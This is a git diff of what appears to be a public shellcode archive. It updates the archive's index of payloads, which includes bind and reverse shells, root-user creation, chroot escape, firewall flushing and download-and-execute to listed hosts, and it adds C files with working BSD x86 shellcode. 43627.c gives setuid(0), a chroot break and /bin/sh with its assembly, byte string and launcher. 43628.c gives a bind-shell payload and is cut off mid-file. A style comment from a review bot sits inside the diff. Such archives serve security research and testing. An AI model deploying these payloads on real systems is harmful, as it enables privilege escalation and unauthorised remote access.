+43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43630,shellcodes/linux_x86/43630.c,"Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43631,shellcodes/linux_x86/43631.c,"Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43621,shellcodes/solaris_sparc/43621.c,"Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode",2009-01-01,"Claes M. Nyberg",shellcode,solaris_sparc
+43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc
+43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind TCP Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc
+43624,shellcodes/solaris_x86/43624.asm,"Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)",2009-01-01,"John Babio",shellcode,solaris_x86
+43625,shellcodes/solaris_x86/43625.c,"Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,shellcode.com.ar,shellcode,solaris_x86
+43632,shellcodes/bsd_x86/43632.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43634,shellcodes/openbsd_x86/43634.c,"OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86
+43635,shellcodes/bsd_x86/43635.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43636,shellcodes/bsd_x86/43636.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43637,shellcodes/linux_x86/43637.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43638,shellcodes/linux_x86/43638.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43639,shellcodes/linux_x86/43639.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43640,shellcodes/bsd_x86/43640.c,"BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43641,shellcodes/linux_x86/43641.c,"Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86
+43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
+43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86
+43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86
+43648,shellcodes/linux_x86/43648.c,"Linux/x86 - Disable Shadowing Shellcode (42 bytes)",2009-07-04,vlan7,shellcode,linux_x86
+43649,shellcodes/linux_x86/43649.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)",2009-07-04,vlan7,shellcode,linux_x86
+43650,shellcodes/linux_x86/43650.c,"Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)",2009-06-18,TheWorm,shellcode,linux_x86
+43651,shellcodes/linux_x86/43651.c,"Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86
+43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86
+43653,shellcodes/linux_x86/43653.c,"Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
+43654,shellcodes/linux_x86/43654.c,"Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
+43655,shellcodes/linux_x86/43655.c,"Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
+43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86
+43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86
+43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86
+43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86
+43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
+43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
 40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
 40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
+40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
 40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
-40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
+40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
 40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
 41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
-41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
+41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
 41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
 41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
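Review bot: The new row for 43627 describes its payload as `execute /bin/sh` while this same commit rewrites the other entries in this hunk (40808, 40924, 41174) to the `execve(/bin/sh)` form, so the added line already breaks the convention it lands next to; suggest `+43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execve(/bin/sh) Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86`. The added block is also not in id order (43628–43631 precede 43621–43625, which precede 43632), which makes later merges of this index harder to review. Both are style points only; the byte counts in the new rows match the files added further down where those are visible.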
@@ -634,25 +686,25 @@ id,file,description,date,author,type,platform
 41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
 41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
 41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
-41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
-41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
+41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
+41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
 41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
-41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
+41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
 41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
 43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
-43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
+43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
-43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
+43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
 43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
-43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
+43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
 43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
 43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
-43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
+43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
 43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
-43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86
+43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
 43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
@@ -676,34 +728,34 @@ id,file,description,date,author,type,platform 43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 -43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 
bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 +43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86 41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 -41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 -41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86 +41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 +41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86 41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 -41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 +41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - 
Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86 41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows -42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 -42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 -42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 +42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 +42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 +42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 -42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve /bin/sh Shellcode (24 
bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 +42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 @@ -711,6 +763,6 @@ id,file,description,date,author,type,platform 42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 -42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 +42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux diff --git a/shellcodes/windows/15116.cpp b/shellcodes/arm/15116.cpp similarity index 100% rename from shellcodes/windows/15116.cpp rename to shellcodes/arm/15116.cpp 
diff --git a/shellcodes/linux_x86/13426.c b/shellcodes/bsd_x86/13426.c similarity index 100% rename from shellcodes/linux_x86/13426.c rename to shellcodes/bsd_x86/13426.c diff --git a/shellcodes/linux_x86/13430.c b/shellcodes/bsd_x86/13430.c similarity index 100% rename from shellcodes/linux_x86/13430.c rename to shellcodes/bsd_x86/13430.c diff --git a/shellcodes/linux_x86/13453.c b/shellcodes/bsd_x86/13453.c similarity index 100% rename from shellcodes/linux_x86/13453.c rename to shellcodes/bsd_x86/13453.c diff --git a/shellcodes/bsd_x86/43627.c b/shellcodes/bsd_x86/43627.c new file mode 100644 index 000000000..3134b1c68 --- /dev/null +++ b/shellcodes/bsd_x86/43627.c @@ -0,0 +1,65 @@ +/* The setuid(0)+chroot()+execve shellcode + + it will: + setuid(0) + put '../' 10 times in chroot() + execute /bin/sh + Size 57 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + + +BITS 32 + + xor ecx,ecx + xor eax,eax + push eax + mov al,0x17 + push eax + int 0x80 + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov cl,0x1e +main_loop: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop + push esp + mov al,0x3d + push eax + int 0x80 + + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 +*/ + + + +char shellcode[] = + "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" + "\x3d\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; + + +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43628.c b/shellcodes/bsd_x86/43628.c new file mode 100644 index 000000000..1f0f00b9f --- /dev/null +++ b/shellcodes/bsd_x86/43628.c 
@@ -0,0 +1,110 @@ +/* The setuid(0)+chroot()+bind shellcode + it will: + setuid(0) + put '../' 10 times in chroot() + open shell on 2222nd port + Size 133 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + +main: + xor ecx,ecx + xor eax,eax + push eax + mov al,0x17 + push eax + int 0x80 + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov cl,0x1e +main_loop1: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop1 + push esp + mov al,0x3d + push eax + int 0x80 + + push byte 0x06 + push byte 0x01 + push byte 0x02 + mov al,0x61 + push eax + int 0x80 + mov edx,eax + xor eax,eax + push eax + push long 0xAE0802ff + mov eax,esp + push byte 0x10 + push eax + push edx + xor eax,eax + mov al,0x68 + push eax + int 0x80 + push byte 0x1 + push edx + xor eax,eax + mov al,0x6a + push eax + int 0x80 + xor eax,eax + push eax + push eax + push edx + mov al,0x1e + push eax + int 0x80 + mov cl,3 + mov ebx,-1 + mov edx,eax +main_loop: + inc ebx + push ebx + push edx + mov al,0x5a + push eax + int 0x80 + dec cl + jnz main_loop + xor eax,eax + push eax + push long 0x68732f6e + push long 